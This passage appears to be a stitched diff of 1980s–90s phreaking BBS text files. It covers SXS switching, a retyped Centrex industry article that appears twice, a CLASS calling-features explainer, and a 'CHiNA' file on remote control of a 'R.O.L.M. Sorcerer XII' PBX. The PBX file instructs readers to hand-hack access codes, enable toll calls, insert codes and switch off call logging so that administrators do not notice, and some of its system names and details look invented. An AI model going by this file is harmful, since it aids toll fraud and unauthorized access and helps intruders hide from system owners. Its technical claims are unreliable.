are routed OUT and INTO the switch. There is no way to "alternate route"
the call to another trunk group if the trunk is busy, so the caller gets a
fast busy (reorder) to tell him to try again later. Also traffic overlaods can
occur if too many people try calling the same group of telephone numbers at
the same time.
. Many SXS COs only have 15 to 20 connectors for every 100 telephone
numbers, therefore only 15 or 20 incoming calls fo all types can be
completed to any of these 100 numbers at once. It is possible for two
customers with 10 lines each all being busy with incoming calls to block the
rest of the 80 people from getting incoming calls.
. Only ROTARY dials can be used in a SXS office. This is because we must
pulse the swithes all the way to the end for each call. If your local CO is
an SXS adnd yo have Touch-Tone dialing, you reall have conversion in the office
taking the tones and sending pulses out to the swithces as if you had a rotary
dial.
. Brought to you by TEAM ZEROX
DOWNLOADED FROM P-80 SYSTEMS 
LP
+218
View File
@@ -0,0 +1,218 @@
Centrex Renaissance
"The Technology"
By John D. Bray * (See below)
Retyped from: On Communications
(October 1985,Vol. 2,No. 10)
By Jester Sluggo
Serious new investment is being made in central office-based
services. Regulators appear to be ready to let the fight begin
in earnest between Centrex and the PBX (Private Branch Exchange).
Local exchange telephone companies have discovered that, in
Centrex, they have the only differentiated product in the crowded
customer-switching marketplace. Hardware manufacturers are
offering new sets and switches in voice/data and data-only
formats. Software developers are recognixing the opportunity to
support the large, established user base. Customers are
beginning to understand that Centrex is an extremely flexible
service concept. Like any modern communications system, Centex
is hardware-dependent. Unlike the options available to most
users, Centrex is not hardware bound.
In 1981, most telephone companies in the U.S. and Canada
decided that they could make more money selling customer
premises-based switching than they could selling central office-
based switching. Following the time-tested "grass is always
greener" school of marketing, the telephone companies' low-key,
service-oriented sales forces convinced themselves that the only
reason they were not selling was that their product did not look
exactly like everyone else's. The regulators seemed to feel that
if they just left their wards to their own devices and AT&T
direction, the regulatory difficulties of Centrex services would
just dissappear.
U.S. District Court Judge Harold Greene's divestiture order
in 1982, though not necessarily a complete surprise to AT&T,
caught the local phone companies with limited planning resources
and few integrated stratigies ready for implementation.
Though there was shock and then lethargy in some quarters,
most telephone companies took action quickly. The establishment
of independent dealers was a giant step in many states. The
telephone comapany recognized itself as a wholesaler of products,
rather than insisting on total customer control. Initially, this
concept was thought to apply to the new, small-user market.
Executone, Inc. saw the license as much more broad than
that. This dealer strategy broadened the terminal equipment
variety available to Centrex customers. There was no need to
wait for the telephone companies to test terminal equipment and
negotiate distribution agreements. Everything in the market was
already compatible with the national telephone network, and
Centrex, as a soft-ware defined feature group, is a component of
that network.
While more sources were becoming available to users,
manufacturers like Northern Telcom, Inc. and Gandalf Data, Inc.
were seeking new ways to enter the marketplace as suppliers to
the telephone companies. Northern Telcom's response to the need
for a digital central office with Centrex capability suggests it
isn't only the telephone companies that have done a quick about-
face.
As no one knew that Centrex would come through divestiture
stronger than ever, Northern Telcom's DMS-100 central office
could only have been developed to be the first giant PBX aimed at
displacing major Centrex installations. Instead, major supply
contracts across the U.S. and Canada for Northern Telcom caused
AT&T, the historically dominant U.S. supplier, to rethink its
central office development strategy. A crash program was
initiated to develope a full array of Centrex features in its
digital technology central office, the 5 ESS. These are
scheduled for customer site testing in January 1986.
While Northern Telcom was teaching new lessons to sum old
suppliers in 1983 and 1984, in 1985 there is a crowd of new
options--that is, new suppliers entering the market and old
suppliers offering new options--for Centrex. GTE Corp.'s
manufacturing arm, Automatic Electric, is trying to get a
foothold in the central office market. Where AT&T and Northern
Telcom are touting the ability of their offices to serve remotes,
ITT is getting a foothold in the market by offering so-called
centrex remotes that bring digital functionality to the customer
while being hosted by extant technology, the 1A ESS.
Like many customers, the telephone companies are learning
that combing voice and data functions in the same switch is not
always a cost-effective answer. Using ordinary bell wire for
local transmission does appear to be an effective answer.
Sophisticated customers, of course, have already beaten the
utilities to that conclusion. They have been using contention
data switches, like Gandalf, in conjunction with Centrex.
Using the in-house cabling provided by the telephone company
to carry both voice and nonvoice traffic simultaniously, these
users strip off the data traffic at the building terminal block,
sending it through the cost-effective contention switch and
letting the time- and quality-sensitve voice traffic pass on to
the central office.
More elaborate solutions for the digital data communications
user are seen in announcements from companies like Wisconsin Bell
and Southern New England Telephone Co., where Siemens
Communications Systems, Inc. equipment is being considered as the
backbone for a separate, switched data network.
Ameritech, working with AT&T, has selected Illinois Bell as
the site for its integrated services digital network trial.
Centrex product managers around the country smile at talk of
ISDN. To their knowledge, none of today's PBX products are
compatible with the ISDN concept. Solutions like the Gandalf and
Siemens options mentioned above extend the functional life of
today's network workhorse, the 1A ESS.
Electronic key telephone service, with its associated
reductions in cable requirement and rearrangement flexibility,
works with Centrex as well as it does with PBX or any basic
telephone service. If the Centrex user has what is generally
known as Centrex II or later editions of Centrex service, these
key systems tend to duplicate many of the features already
incorporated in the basic Centrex line rates. AT&T and Northern
Telcom have produced additional product lines that work only with
Centrex, as proprietary sets do with PBXs.
In the case of AT&T, a subprocessor must be installed in the
central office. Northern Telcom has takien another step. With
its Unity series, rather than duplicate the array of features
inherent in the central office itself, Northern Telcom has
produced a series of high-function sets that combine flexibility
with economy.
These feature sets actually use the in-place, two-pair
station wire. They can be monitored by a receptionist using a
small console that displays either 15 or 30 station-busy lamps.
The console positions use either 25- or 50-pair cable. Several
companies, including the Redmond, Wash.-based Tone Commander
Systems, Inc., have produced Centrex consoles. Many of these are
aimed at providing low-cost console operation for the small
Centrex customer where little support was available before.
The telephone companies are also reaching out to make
Centrex compatible with adjunct systems, like voice messaging.
In 1982, the 1A ESS talked only to itself when doing call
processing. Now, when it finds a called station busy or one that
does not answer, it will retain the number of the first station
called. When it forces the call to a predignated point, like a
customer-owned voice message center, it first passes on the
original called telephone number. This enables the message
center to bring up a screen filled with data on the party that is
normally located at the originally called number. When the
message center takes the forwarded call, the call can be answered
professionally and personally.
Direct customer control of the telephone number and line
feature arrangements has become commonplace in companies with an
aggressive Centrex policy.
The moves and changes area has become one of the most
contested in Centrex software development. Products have been
developed by AT&T, Bell Communications Research, Inc. and
American Telecorp, Inc., as well as local products developed by
Illinois Bell, Nynex Corp. and Northwestern Bell. Each of these
products is aimed primarily at speeding up the rearrangement
process while cutting costs for both the customer and the
telephone company.
Telco Research Corp. of Nashville, Commercial Software, Inc.
of New York and several others have entered the lists with
mainframe-,mini-,and microcomputer-based systems, each aimed at
providing a cost-effective solution to an old, but now more
critical customer management problem. System size and the
desired speed of reports will usually dictate the best answer for
each user.
An area of rapidly expanding interest in Centrex is the
multitenant market. Several telephone companies have seen enough
potential to put new offering together that will take new names
and have new rate structures. Basic Centrex advantages, like its
ability to handle expansion and contraction easily, while leaving
serious maintenance problems in the hands of the telephone
companies, seem to be important factors. Customer control of
moves and changes also plays a major role.
Technology no longer appears to be a limiter to central
office-based services. Centrex will give way to a host of new
labels denoting more specialized services.
No longer dependent on a single source for innovation,
development and distribution, the Centrex customer and the
telephone company alike can look forward to an increasing rate of
innovation.
All of the manufacturers with an interest in the market of
not yet established a place. Major firms, like Ericsson
Information Systems, do not plan to be left out. ITT's strategy
to start with Centrex remotes and build back into the central
office has potential. The excitement surrounding the resurgence
of Centrex in the U.S. and Canada has triggered serious inquiries
from Europe.
Several other factors will determine whether development
accelerates as fast as it can, including regulators, customers,
telephone company management, embedded processes and alternative
technologies. At the end of Round 1, Centrex has surprised many
observers and reassured others. Unless sumone fixes the fight,
it is going all the way.
* Note: Bray is vice-president, marketing, for American Telecorp,
Inc., Redwood City Calif.
Watch for Part 2 of Centrex Renaissance, "The Regulations",
written by Leslie Albin.
The above text was written primarily for people in marketing
telephone technologies. In the interests of the phreaking world,
I hope that you can focus on the business side of
telecommunications which may be in your future. There are more to
PBX's than 0-700-456-1001. Any comments, questions, or
corrections may be emailed to me at Metalshop, or to:
J. Sluggo
P.O. Box 93
East Grand Forks,MN 56721
This file is dedicated to Bambi for bringing me my fondest
memories -- There is "No One Like You!" -- The Scorpions.
/
\
/ luggo !!

+207
View File
@@ -0,0 +1,207 @@
Centrex Renaissance
"The Technology"
By John D. Bray * (See below)
Retyped from: On Communications
(October 1985,Vol. 2,No. 10)
By Jester Sluggo
Serious new investment is being made in central office-based
services. Regulators appear to be ready to let the fight begin
in earnest between Centrex and the PBX (Private Branch Exchange).
Local exchange telephone companies have discovered that, in
Centrex, they have the only differentiated product in the crowded
customer-switching marketplace. Hardware manufacturers are
offering new sets and switches in voice/data and data-only
formats. Software developers are recognixing the opportunity to
support the large, established user base. Customers are
beginning to understand that Centrex is an extremely flexible
service concept. Like any modern communications system, Centex
is hardware-dependent. Unlike the options available to most
users, Centrex is not hardware bound.
In 1981, most telephone companies in the U.S. and Canada
decided that they could make more money selling customer
premises-based switching than they could selling central office-
based switching. Following the time-tested "grass is always
greener" school of marketing, the telephone companies' low-key,
service-oriented sales forces convinced themselves that the only
reason they were not selling was that their product did not look
exactly like everyone else's. The regulators seemed to feel that
if they just left their wards to their own devices and AT&T
direction, the regulatory difficulties of Centrex services would
just dissappear.
U.S. District Court Judge Harold Greene's divestiture order
in 1982, though not necessarily a complete surprise to AT&T,
caught the local phone companies with limited planning resources
and few integrated stratigies ready for implementation.
Though there was shock and then lethargy in some quarters,
most telephone companies took action quickly. The establishment
of independent dealers was a giant step in many states. The
telephone comapany recognized itself as a wholesaler of products,
rather than insisting on total customer control. Initially, this
concept was thought to apply to the new, small-user market.
Executone, Inc. saw the license as much more broad than
that. This dealer strategy broadened the terminal equipment
variety available to Centrex customers. There was no need to
wait for the telephone companies to test terminal equipment and
negotiate distribution agreements. Everything in the market was
already compatible with the national telephone network, and
Centrex, as a soft-ware defined feature group, is a component of
that network.
While more sources were becoming available to users,
manufacturers like Northern Telcom, Inc. and Gandalf Data, Inc.
were seeking new ways to enter the marketplace as suppliers to
the telephone companies. Northern Telcom's response to the need
for a digital central office with Centrex capability suggests it
isn't only the telephone companies that have done a quick about-
face.
As no one knew that Centrex would come through divestiture
stronger than ever, Northern Telcom's DMS-100 central office
could only have been developed to be the first giant PBX aimed at
displacing major Centrex installations. Instead, major supply
contracts across the U.S. and Canada for Northern Telcom caused
AT&T, the historically dominant U.S. supplier, to rethink its
central office development strategy. A crash program was
initiated to develope a full array of Centrex features in its
digital technology central office, the 5 ESS. These are
scheduled for customer site testing in January 1986.
While Northern Telcom was teaching new lessons to sum old
suppliers in 1983 and 1984, in 1985 there is a crowd of new
options--that is, new suppliers entering the market and old
suppliers offering new options--for Centrex. GTE Corp.'s
manufacturing arm, Automatic Electric, is trying to get a
foothold in the central office market. Where AT&T and Northern
Telcom are touting the ability of their offices to serve remotes,
ITT is getting a foothold in the market by offering so-called
centrex remotes that bring digital functionality to the customer
while being hosted by extant technology, the 1A ESS.
Like many customers, the telephone companies are learning
that combing voice and data functions in the same switch is not
always a cost-effective answer. Using ordinary bell wire for
local transmission does appear to be an effective answer.
Sophisticated customers, of course, have already beaten the
utilities to that conclusion. They have been using contention
data switches, like Gandalf, in conjunction with Centrex.
Using the in-house cabling provided by the telephone company
to carry both voice and nonvoice traffic simultaniously, these
users strip off the data traffic at the building terminal block,
sending it through the cost-effective contention switch and
letting the time- and quality-sensitve voice traffic pass on to
the central office.
More elaborate solutions for the digital data communications
user are seen in announcements from companies like Wisconsin Bell
and Southern New England Telephone Co., where Siemens
Communications Systems, Inc. equipment is being considered as the
backbone for a separate, switched data network.
Ameritech, working with AT&T, has selected Illinois Bell as
the site for its integrated services digital network trial.
Centrex product managers around the country smile at talk of
ISDN. To their knowledge, none of today's PBX products are
compatible with the ISDN concept. Solutions like the Gandalf and
Siemens options mentioned above extend the functional life of
today's network workhorse, the 1A ESS.
Electronic key telephone service, with its associated
reductions in cable requirement and rearrangement flexibility,
works with Centrex as well as it does with PBX or any basic
telephone service. If the Centrex user has what is generally
known as Centrex II or later editions of Centrex service, these
key systems tend to duplicate many of the features already
incorporated in the basic Centrex line rates. AT&T and Northern
Telcom have produced additional product lines that work only with
Centrex, as proprietary sets do with PBXs.
In the case of AT&T, a subprocessor must be installed in the
central office. Northern Telcom has takien another step. With
its Unity series, rather than duplicate the array of features
inherent in the central office itself, Northern Telcom has
produced a series of high-function sets that combine flexibility
with economy.
These feature sets actually use the in-place, two-pair
station wire. They can be monitored by a receptionist using a
small console that displays either 15 or 30 station-busy lamps.
The console positions use either 25- or 50-pair cable. Several
companies, including the Redmond, Wash.-based Tone Commander
Systems, Inc., have produced Centrex consoles. Many of these are
aimed at providing low-cost console operation for the small
Centrex customer where little support was available before.
The telephone companies are also reaching out to make
Centrex compatible with adjunct systems, like voice messaging.
In 1982, the 1A ESS talked only to itself when doing call
processing. Now, when it finds a called station busy or one that
does not answer, it will retain the number of the first station
called. When it forces the call to a predignated point, like a
customer-owned voice message center, it first passes on the
original called telephone number. This enables the message
center to bring up a screen filled with data on the party that is
normally located at the originally called number. When the
message center takes the forwarded call, the call can be answered
professionally and personally.
Direct customer control of the telephone number and line
feature arrangements has become commonplace in companies with an
aggressive Centrex policy.
The moves and changes area has become one of the most
contested in Centrex software development. Products have been
developed by AT&T, Bell Communications Research, Inc. and
American Telecorp, Inc., as well as local products developed by
Illinois Bell, Nynex Corp. and Northwestern Bell. Each of these
products is aimed primarily at speeding up the rearrangement
process while cutting costs for both the customer and the
telephone company.
Telco Research Corp. of Nashville, Commercial Software, Inc.
of New York and several others have entered the lists with
mainframe-,mini-,and microcomputer-based systems, each aimed at
providing a cost-effective solution to an old, but now more
critical customer management problem. System size and the
desired speed of reports will usually dictate the best answer for
each user.
An area of rapidly expanding interest in Centrex is the
multitenant market. Several telephone companies have seen enough
potential to put new offering together that will take new names
and have new rate structures. Basic Centrex advantages, like its
ability to handle expansion and contraction easily, while leaving
serious maintenance problems in the hands of the telephone
companies, seem to be important factors. Customer control of
moves and changes also plays a major role.
Technology no longer appears to be a limiter to central
office-based services. Centrex will give way to a host of new
labels denoting more specialized services.
No longer dependent on a single source for innovation,
development and distribution, the Centrex customer and the
telephone company alike can look forward to an increasing rate of
innovation.
All of the manufacturers with an interest in the market of
not yet established a place. Major firms, like Ericsson
Information Systems, do not plan to be left out. ITT's strategy
to start with Centrex remotes and build back into the central
office has potential. The excitement surrounding the resurgence
of Centrex in the U.S. and Canada has triggered serious inquiries
from Europe.
Several other factors will determine whether development
accelerates as fast as it can, including regulators, customers,
telephone company management, embedded processes and alternative
technologies. At the end of Round 1, Centrex has surprised many
observers and reassured others. Unless sumone fixes the fight,
it is going all the way.
* Note: Bray is vice-president, marketing, for American Telecorp,
Inc., Redwood City Calif.
Watch for Part 2 of Centrex Renaissance, "The Regulations",
written by Leslie Albin.
The above text was written primarily for people in marketing
telephone technologies. In the interests of the phreaking world,
I hope that you can focus on the business side of
telecommunications which may be in your future. There are more to
PBX's than 0-700-456-1001. Any comments, questions, or
corrections may be emailed to me at Metalshop, or to:
J. Sluggo
P.O. Box 93
East Grand Forks,MN 56721
This file is dedicated to Bambi for bringing me my fondest
memories -- There is "No One Like You!" -- The Scorpions.
+116
View File
@@ -0,0 +1,116 @@
ZDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD?
CBDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDB4
33 CHiNA CHiNA 33
33 R.O.L.M. Sorcerer XII PBX Remote System Control 33
33 33
33 By: The Conflict 33
CADDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDA4
3DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDY
INTRO : I know right off you people are thinking, "How in the Hell
do I know if I am calling a R.O.L.M. Sorcerer XII PBX?".
Well, that will be covered here, along with all system
commands available on that PBX.**Of course, this file is
meant for educational purposes only. We at CHiNA hereby
waive any legal reprimand due to misuse of the information
contained in this file (so there!).**
HOW : A R.O.L.M. Sorcerer XII PBX has a unique answer; thus, it
IT is quite distinguishable from most other PBX's. I will list
SOUNDS some PBX's with similar answer devices at the end of this
section. The Sorcerer XII's answer consists of: A.) No
ring, B.) A short diverting tone of 2600 Hz, and C.) A
standard, no interrupt AT&T 4.2c dial tone. Unfortunately,
there are four known PBX's that have a similar answer device,
but not exact. These four are as follows: A.) R.O.L.M.
Sorcerer III, B.) SouthWestern Bell WizSys I, C.) Northern
Telecom SL-Net V, and D.) Siemans WebLink v.Ia. The slight
differences between these systems answer devices are the
dial tones. The dial differ either in tone, volume, or
interrupt/no interrupt. With practice, you will find the
Sorcerer XII easy to distinguish.
WHAT : Now, most often Sorcerer XII requires a four digit code, but
TO DO this can be altered at the source, so it is not entirely
consistent. To be able to utilize the Remote System Control
(RSC from here out) commands, you must obtain the System
Command Code. The System Command Code consists of the
original number of digits plus a two digit authorization
check. Thus, if we were dealing with a four digit Sorcerer
XII system, we would find the four digit System Command Code
followed by two more digits. *How do you know if you have the
first set of the SCC?* A four tone confirmation, similar to
the one given by ASPEN VMNetworks, is given when you have the
first digit set of the SCC; then, you must discover the two
digit confirmation code. The confirmation code is updated
every week. Finding the SCC is not going to be easy, as you
can not utilize a cutesy code hacker on your computer.
Essentially, the process will take dedicated hand hacking,
and scanning for that matter.
SYSTEM: Since this is a PBX, there are no voice instructions; thus,
COMMAND you must know what the hell you're doing! After you have
LEVEL obtained the correct confirmation code, two short beeps are
transmitted. This is your cue; you're in! The commands are
two digits followed by the asterisk (*) key. Since there are
many commands, I will list only those which are essential to
your life and needs. You can experiment with the other ones.
07* - input 1, 2, or 3; alters error transmission. 1 is fake
carrier, 2 is fast-busy, 3 is sweep-siren.
19* - allows removal of codes from the programed code array.
You must enter the code to be removed, followed by the
pound key (#).
20* - allows insertion of codes. You must input the code,
followed by the pound key (#). Be careful, as a
precise log of all code insertions is kept.
43* - enables calls to toll numbers, such as 0700, 1900, and
976.
44* - disables calls to toll numbers. Be sure to disable
the function immediately after you are done with it.
If it is left on, the administrator knows what's going
on and will investigate.
73* - enables making log of all calls placed through Sorcerer
XII lines.
74* - disables making log of all calls placed through
Sorcerer XII lines. Once again, disable 73 if you use
it, as it is obvious to the administrator what's going
on.
99* - disconnect from the system command level. Make sure
to do this before hanging up, as it will hang the PBX,
and things will definantly be switched around.
Have fun, be careful, and take it easy. All the information included
should be enough to provide hours of safe enjoyment. If you have any
questions for CHiNA concerning anything, give us a call at one of the
below-listed CHiNA Nodes. Spread this around!!!
Tinsel Town Rebellion 12/24/96
713-451-9548
The Forbidden Passage 12/24
713-774-0449
Optical Illusions 12/24
713-578-0722
The Ultimate Revolution 12
713-492-0438
Later,
The Conflict
<CHiNA>
Thanks go out to Maxwell Smart for acquiring a partial R.O.L.M.
manual; Count Zero for being a swell guy; The Viper for giving us a
'home'; Monalisa Overdrive for anti-procrastination support; and last
but not least, NAP/PA for instilling in us a realization that we do
not want to do nothing!
+337
View File
@@ -0,0 +1,337 @@
Custom Local Area Signalling Services
Written by: The Videosmith
Version - 1.1
----------------------------(c) Copyright 1994---------------------------
This article will explain the newly developed LASS system (AT&T Bell Labs),
and how it may affect us in the near future. Note that the service as it
appears for customers is called "CLASS", the C standing for Custom. I
assume this is just for looks.
LASS
----
The telephone was destined to become a well used and powerful tool for
otherwise tedious tasks. Gas meters and other metered services would be
surveyed through the use of automatic data retrieval employing telephone
communications. All in all, some have big plans for the uses one could put
the telephone system up to, and CLASS is one plan that is going to drop an
innovative bombshell on the telecommunicating world.
At this moment, a local CCIS network feature is being developed by Bell
Laboratories. This feature will change the way people use fones, and will
also change the attitude in which they use them. It will give far more
control of the telephone to the user than ever before. This feature is
called CLASS (Custom Local Area Signalling Services).
Everyone will find something useful in this newly developed telephone
feature. Pizza parlours will no longer have to worry about fraudulent
italian food mongers, and little old ladies won't have to worry about prank
calls by certain dubious characters.
What are all these fantastic features? These features will include call
back of the last caller, regardless of whether you have their telephone
number or not. Another will be distinct call waiting tones, and preselected
call forwarding (only those people whom you wish to speak to will be
forwarded). This is a rudimentary list of CLASS features to come. It is a
very powerful system, and it all relys on LCCIS (Local Common Channel
Interoffice Signalling), an intra-LATA version of the ever-popular CCIS.
CCIS Background ---------------
CCIS was originally introduced in 1976 as, basically, the signalling
system to end all signalling systems. Instead of using the voice grade
trunks to carry signalling information on, a data network would be used.
This network is comprised of data links from each TO [involved with CCIS]
to the appropriate STP (signal transfer point). Signalling information is
sent through these links at 4800 bps to the STPs (Note that baud rates may
increase due to the economic availability of faster data communications
hardware), where stored program control routes the signalling information
to the needed offices in order to open and complete the call path. SPC
checks automatically for on-hook/off-hook status before opening the path,
and if the status is off-hook (in this case the customer does not have the
call waiting custom calling feature), returns information to the
originating CO to apply a busy signal to the customer. This is but one of
many features toll CCIS provides the network with.
Since this text is not centered on the topic of toll CCIS, technical
aspects aren't as important (except for the comparison between the local
and toll networks for observational purposes): yet it is important to
notice how automated and flexible this type of signalling method is, as
well as its speed and efficiency. All the software control involved with
local and toll networks is called, fittingly, the "stored program control
network." or ISDN (Integrated Services Digital Network). LCCIS will be
addressed in a future article.
CLASS/LCCIS Features --------------------
LCCIS would look like this:
/--\
CO-2
ESS#
/----I-T-G-----1A-----I-T-G----\
| \--/ |
| | |
| LCCIS |
| | |
| ---------- |
/--\--LCCIS--|CCIS/SPC|--LCCIS--/--\
CO-1 ---------- CO-3
ESS# ESS#
-1A----interoffice trunk group---1A-
\--/ \--/
SPC = Stored Program Control (Network control and Signal Transfer Point)
ITG = Interoffice Trunk Group
Using a high-speed data link between local offices creates a much more
flexible and more effecient way for intra-LATA central offices to communi-
cate. Instead of using per-trunk signalling (using the same trunk used for
voice transmission to send routing and billing information), such data
would be sent thru a 2400 bps dedicated data link, which interacts with a
local signal processing and transfer point. From that point, signalling
information is distributed to appropriate central offices or tandem
switches.
At the time during which this article was being initially researched, CLASS
was only being developed for the #1A ESS switch due to the flexibility of
it's memory handling, it's speed and what Bell Labs called 'cost
efficiency'. At the end of the research involved with this article, CLASS
was already implemented in data stage on ESS#5.
LCCIS will work with the local switches using stored program con-trol,
keeping track of call data. The 1A switches will use what is called
"scratch pad" memory (also known as call store), in conjuction with LCCIS's
database, to accomplish all the features that LASS provides. This memory
will hold such data as "line history", and a "screening list". That
information will make it possible for autoredial, selective call
forwarding, nuisance call rejection, and distinctive call waiting tones.
Selective CF ------------
Selective call forwarding is defined by the subscriber (the sub-scriber
must have conventional call forwarding to request this service). Using
call store, or more specifically the screening list, one will be able to
selectively forward a call to another directory number by executing a few
simple commands on the friendly home-bound telephone (unlike migrating
telephones most frequently found in hotel rooms). An access code (a list
will appear at the end of the file) will be entered, and a special tone
will be issued from the subscriber's CO. The cus-tomer will then dial in
the numbers he wants forwarded to the particular number. After each number,
a tone will sound indicating the acceptance of the number. Individual BOC's
(Bell Operating Companies) will be able to define the amount of numbers
which may be screened. Once this is done, the cusomter hangs up and the ESS
takes over. Now, whenever some one calls this particular customer, the
customer's switch will compare the calling line's directory number with
those stored in scratch pad memory. If the CLID matches one of the numbers
in 1A memory associated with the called directory number, the number is
forwarded. If not, the phone will ring at the original destination. This in
particular could make it very difficult on system hackers, as you could
probably imagine. A company can subscribe to this CLASS feature, and enter
only the numbers of authorized users to be forwarded to a computer. Bureaus
inside the various telephone companies and other sensitive operations can
screen calls to particular numbers by using this service.
This is a security that's hard to beat, but of course there is a way
(simple law of nature: nothing is fail-safe). There will always be the
obvious way of finding numbers which are being forwarded to, like auto-
dialing entire exchanges (one after the other). Unfortunetly, CLASS will be
providing other services which might make "scanning" seem less attractive.
Distinctive Ringing
-------------------
Distinctive ringing is handled in the same fashion as selective call
forwarding is: the screen list in scratch pad memory. The customer may
enter numbers which the ESS should give special precedence to, and when-
ever a call is placed to this particular customer's number, ESS checks to
see whether the CLID matches a directory number listed in the switch's
memory. If a match is made, the subscriber's CO gives the off-hook line a
special call waiting tone, or the on-hook phone a distinctive ring
(possibly using abnormally timed ringing voltage... some readers may
picture a British Telecom ring as an example, although many foreign audible
rings tend to be different).
Call Rejection
--------------
Nuisance call rejection, a feature making it possible to block certain
idiots from ringing your fone (a feature we can all benefit from at one
time or another... or all the time), uses the information retrieved from
LCCIS (CLID). Let's say customer A calls customer B:
----LCCIS----
A ---> CO< >CO ---> B
----trunk----
Customer B happens to despise customer A, and keys in a special *##
code. ESS again takes over and looks at the CLID information, and stores
the calling line directory number in a special screen list associated with
with customer B. The next time customer A tries calling customer B, the
terminating office will reroute the call to a local (the originating CO)
digitized recording telling customer A that the call he made cannot be
completed due to customer B's request ("I'm sorry, but the customer you
have tried to reach wishes you were eaten by a rabid canibal on drugs").
Dial Back
---------
To create such a feature as "dial back" (for called or calling party),
the ESS scratch pad memory is used again. The same principles are used as
are employed in the already established custom calling feature, auto-
redial. CLID will be used in this way:
(received from CLID)
last-called-mem last-caller-mem
---------- ----------
|###-####| |###-####|
---------- ----------
Your ESS switch will keep track of who you called last, and who called
you last, thru the retrieval of calling line information provided by LCCIS
in conjunction with your switch (Your switch will know what number you
called last by directly storing the digits you dialed previously. Local
signalling will provide calling line information via LCCIS call information
forwarding using the data link mentioned). This way, with your access code
(*##), you will have total re-dial service.
Customer Trace
--------------
This type of memory handling and signalling method will also allow the
feature that everyone was afraid would abolish "phreaking". Subscriber
initiated tracing, using the last caller directory number stored at your
CO, will be available as far as Bell Laboratories is concerned. There seems
to be two types of "customer originated trace". One will forward the number
to local authorities, at which it will be handled through the police. The
other feature AT&T/Bell Labs is working on will be a display module that
will sit by your fone, and will display calling directory numbers. All
other CLASS features that use the calling line information are used at the
descretion of the caller. The customer originated trace, however, using the
individual or bulk calling line identification features ("trace") allow the
customer to view the calling number. The world is not ending... yet, in any
case. Individual customers will be able to employ a special "privacy code",
which when dialed, tells the far-end switch not to forward the calling
number to a desk display. Whether there will be a way to override this or
not is obvious: of course. The police, the military and government
agencies are all likely to have a higher priority level than your privacy.
It seems that long distance carriers could benefit greatly from CLASS. Why
Bell/AT&T should give any type of special services to OCCs not given to
other non-telephone companies, especially after equal access is fully
implemented, I don't know (but then again, it is EQUAL access). It's always
possible. It is also possible that there will be no desk display. There are
those phone phreaks who feel that BOC's will never give the end party the
priviledge of retrieving the calling party's number directly, if not due to
plain old Bell policy on the issue of privacy. We'll have to wait and see
about that point: the desk display is, in fact, operational and is being
used in test stage. Whether Bell Labs feels that this feature can and will
be used in a full scale non-beta stage BOC situation is a different story.
The economic feasability is questionable.
End Notes
---------
CLASS, using local CCIS, will not function on inter-LATA calls. The
local CCIS network is exactly that: local, and does not extend into the
realm of "toll network". This will eventually be corrected (allowing toll
CCIS to interact with LCCIS as far as CLID information is concerned). How
the various long distance networks will exchange information with the local
BOC network has not been determined [by the writer of this article]. It
would seem like a monumental task to try to integrate the emerging long
distance companies into the AT&T/BOC ISDN, be it because of equipment
inconsistancies or lack of cooperation on the part of the OCC, etc. This
will be discussed in an upcoming article dealing with toll CCIS. Although
CLASS has been built around the ESS #1A switch, it has, as has been
mentioned, been co-developed for use with the ESS #5 switching machine.
CLASS is going to cause problems, as well as create a new environment
for telephone users. Of course, those problems are only problems to people
who will generally be reading this article, but the more you know about
CLASS the more comfortable you'll feel about the service. It can be used to
one's advantage, even as a telecommunications hobbyist. Just as a
corporation will be able to set up a complete history of who is calling
their system, and eventually keep people off the system using the screen
list in memory, the same features can be applied to bulletin board systems
and the like. Imagine being able to keep all the local bozos off your
board, or being able to screen all but your private local users (making
your system completely inaccessible through the PSTN network from any
telephone but that of one of your users). It would seem to be a useful
feature, if nothing else but an easy feature, to implement.
It is a little difficult, if not plain awkward, to write an article
about a topic which is subject to change at the researcher's ignorance. I
think that CLASS is enough of a momentous issue that at least some text by
a hobbyist should be released for public knowledge purposes. Yet my
awareness of the fact that some of this text may be outdated, or
inaccurate, by the time CLASS is released as a BOC service, is in itself
the explanation of why there is a version number at the head of this
article. Most likely, when CLASS becomes public, the second version will be
released with update notes (if need be...most probably so). I hope you
enjoyed it,
The Videosmith. LOD/LOH!
---------------------------------------
Test stage defaults for some features:
DTMF ! Pulse ! Description of Service
---------------------------------------
*66 ! 1166 ! Reconnect last caller
---------------------------------------
*63 ! 1163 ! Selective Call Forward
---------------------------------------
*60 ! 1160 ! Nuisance Call Blocking
---------------------------------------
*57 ! 1157 ! Customer "Trace"
---------------------------------------
Note: These command codes may vary from BOC to BOC. The codes listed above
were found in a general description of CLASS and did not specify a particular
implementation of these services.
Acknowledgements:
Mark Tabas for his views on various included topics... for example, subscriber
tracing ("FUCK NO").
Doctor <413> Who
Mr. DNA
Downloaded from Just Say Yes. 2 lines, More than 500 files online!
Full access on first call. 415-922-2008 CASFA
Another file downloaded from:
!
-$- & the Temple of the Screaming Electron
! * Walnut Creek, CA
+ /^ |
! | |//^ _^_ 2400/1200/300 baud (415) 935-5845
/^ / @ | /_-_ Jeff Hunter, Sysop
|@ _| @ @|- - -|
| | | /^ | _ | - - - - - - - - - *
|___/____|_|_|_(_)_| Aaaaaeeeeeeeeeeeeeeeeee! /
Specializing in conversations, E-Mail, obscure information,
entertainment, the arts, politics, futurism, thoughtful discussion,
insane speculation, and wild rumours. An ALL-TEXT BBS.
"Raw data for raw minds."
Distributed in Europe by:
Info Addict +46-498-22113 located just outside the coast of Sweden.
----> Largest Gfile Collection In Europe <----
Yet a new creature has risen to the mideastern sun....

+102
View File
@@ -0,0 +1,102 @@
CLASS
CLASS, or Custom Local Area Signaling Services, is coming to a neighborhood
near you. Because of the inception of Signaling System 7, network and
associated databases, a certain class (no pun intended) of services are being
offered to various telco customers around the country as this is written and
phone com- panies are desperately trying to perpetrate these expensive little
ad-ons across the U.S. Although some states are, for the moment, effectively
blocking them through various maneuvers in the courts.
CLASS will do several different things, the primary one being what is known
as CND, or as some people call it CNID or CNI. The idea used to be known as
ANI, but the aaonym seems to have settled down somewhat to CND or CNID, these
